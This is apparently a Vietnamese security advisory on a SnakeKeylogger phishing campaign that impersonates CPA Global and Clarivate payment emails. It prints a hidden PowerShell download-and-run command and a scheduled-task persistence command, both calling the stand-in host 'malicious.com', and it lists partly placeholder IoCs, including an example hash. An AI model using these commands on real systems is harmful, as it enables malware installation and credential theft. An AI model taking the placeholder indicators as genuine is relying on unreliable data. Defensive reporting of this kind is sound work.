Một chiến dịch tấn công mạng mới được phát hiện đang triển khai biến thể tinh vi của mã độc SnakeKeylogger. Chiến dịch này sử dụng các email được thiết kế để giả mạo thông báo thanh toán hợp pháp từ CPA Global và Clarivate.

Các nhà nghiên cứu đã xác định vector lây nhiễm vào ngày 07 tháng 10 năm 2025. Nạn nhân nhận được email có tiêu đề như “remittance advice for the payment dated 07-Oct-2025”. Những email này yêu cầu họ tải xuống một tệp ISO hoặc ZIP đính kèm chứa một script BAT độc hại.

Phân phối Payload và Kỹ thuật Lừa đảo

Chiến dịch lợi dụng kỹ thuật lừa đảo (social engineering) bằng cách giả mạo địa chỉ email người gửi. Các địa chỉ như “CPA-Payment Files” và tên hiển thị đề cập đến CPA Global hoặc Clarivate được sử dụng. Điều này tạo ra vẻ ngoài hợp pháp cho mồi nhử phishing.

Email chứa một đoạn văn bản ngắn yêu cầu người nhận xem lại thông báo thanh toán đính kèm. Kèm theo là hình ảnh mô phỏng tiêu đề thư của công ty để tăng độ tin cậy.

Khai thác PowerShell để tải Payload

Tệp đính kèm độc hại được gửi dưới dạng ảnh ISO hoặc kho lưu trữ ZIP nén. Cả hai định dạng đều chứa một script BAT duy nhất.

Khi được thực thi, script này sẽ âm thầm gọi một chuỗi lệnh PowerShell. Các lệnh này tải xuống và chạy phần mềm cấy ghép mã độc SnakeKeylogger từ một máy chủ từ xa.

Việc sử dụng các container ISO giúp chiến dịch vượt qua các chính sách quét tệp ZIP đơn giản. Đồng thời, kiến trúc hai giai đoạn làm phức tạp quá trình phát hiện.

Sau khi người dùng tương tác với tệp đính kèm, script BAT sẽ thực thi một lệnh PowerShell một dòng tương tự như sau:

powershell -windowstyle hidden -command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.com/loader.exe', '%TEMP%loader.exe'); Start-Process '%TEMP%loader.exe'"

Lệnh này hướng dẫn PowerShell tải xuống tệp thực thi của mã độc SnakeKeylogger (loader.exe) vào một thư mục tạm thời và khởi chạy nó. Kiểu cửa sổ ẩn đảm bảo ít chỉ báo trực quan nhất.

Cơ chế hoạt động của mã độc SnakeKeylogger

Một khi được thực thi, mã độc SnakeKeylogger sẽ móc nối vào các tiến trình trình duyệt và API keylogging. Mục tiêu là thu thập thông tin đăng nhập và token phiên làm việc.

Phần mềm độc hại này đóng gói chức năng cốt lõi của nó vào một tệp thực thi nhẹ dưới 800 KB. Điều này cho phép tải xuống và thực thi nhanh chóng.

Kỹ thuật Injection và Exfiltration

Các nhà nghiên cứu đã quan sát thấy rằng payload sử dụng các lệnh gọi Windows API để tiêm vào các tiến trình hợp pháp. Ví dụ như explorer.exe hoặc svchost.exe, nhằm né tránh các giải pháp bảo vệ điểm cuối.

Sau khi thu thập dữ liệu keystroke và clipboard, mã độc SnakeKeylogger nén các bản ghi. Sau đó, mã độc này rò rỉ dữ liệu qua các yêu cầu HTTP POST tới một điểm cuối command-and-control (C2) được lưu trữ trên một máy chủ web bị xâm nhập.

Lưu lượng rò rỉ dữ liệu xuất hiện hợp pháp nhờ việc sử dụng user-agent HTTP tiêu chuẩn và mã hóa thông qua mã hóa base64. Điều này làm cho việc phát hiện trở nên khó khăn hơn.

Cơ chế Duy trì Quyền Truy cập (Persistence)

Mã độc đạt được tính bền vững bằng cách tạo một tác vụ theo lịch trình (scheduled task) có tên “SysUpdate” kích hoạt mỗi giờ:

schtasks /create /tn "SysUpdate" /tr "powershell -windowstyle hidden -command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.com/loader.exe', '%TEMP%\loader.exe'); Start-Process '%TEMP%\loader.exe'"" /sc hourly /ri 1 /f

Điều này đảm bảo rằng ngay cả khi tiến trình bị chấm dứt, nó sẽ tự động khởi chạy lại. Các nhà phân tích cũng phát hiện ra rằng tác nhân đe dọa đã đăng ký nhiều tên miền phụ để kết nối dự phòng. Điều này cho phép tính sẵn sàng cao của hạ tầng C2.

Chỉ dấu Thỏa hiệp (IoCs) và Biện pháp Phòng ngừa

Chiến dịch mã độc SnakeKeylogger cho thấy việc kết hợp kỹ thuật lừa đảo đơn giản với các công cụ tích hợp sẵn của Windows như PowerShell có thể tạo điều kiện cho hành vi trộm cắp thông tin đăng nhập lén lút ở quy mô lớn.

Danh sách IoC

Các nhóm bảo mật nên theo dõi các Chỉ dấu Thỏa hiệp (IoC) sau để phát hiện và giảm thiểu chiến dịch này:

• Tên miền C2:
  • malicious.com
  • fallback-c2.net
• Hash MD5 của Payload:
  • e3b0c44298fc1c149afbf4c8996fb924 (ví dụ, thay bằng hash thực tế nếu có)
• Tên tác vụ theo lịch trình:
  • SysUpdate
• Địa chỉ email người gửi giả mạo:
  • CPA-Payment Files <[email protected]>
  • Clarivate Payments <[email protected]>

Khuyến nghị Bảo mật và Phát hiện Xâm nhập

Các tổ chức nên tăng cường nhận thức người dùng về việc kiểm tra kỹ lưỡng các email liên quan đến thanh toán. Đồng thời, triển khai các chính sách sandbox tệp đính kèm mạnh mẽ.

Sử dụng các giải pháp phát hiện dựa trên hành vi để bắt giữ các hoạt động tiêm tiến trình độc hại và rò rỉ dữ liệu.

Việc tăng cường ghi nhật ký các tác vụ theo lịch trình và các điểm thoát mạng sẽ rất quan trọng. Điều này giúp xác định và làm gián đoạn mối đe dọa này trước khi dữ liệu nhạy cảm bị rò rỉ dữ liệu.

Các nhóm bảo mật được khuyến nghị chặn các tên miền, giá trị hash và tác vụ theo lịch trình đã xác định ở lớp biên và điểm cuối.

Các giải pháp lọc email nên thực thi việc kiểm tra tệp ISO chặt chẽ hơn. Đồng thời, gắn cờ bất kỳ email nào chứa lệnh PowerShell trong tệp đính kèm.

Các nền tảng bảo vệ điểm cuối phải được điều chỉnh để phát hiện tiêm tiến trình bất thường và các tác vụ theo lịch trình không được phép. Các biện pháp này là cần thiết để chống lại các biến thể mới của mã độc SnakeKeylogger.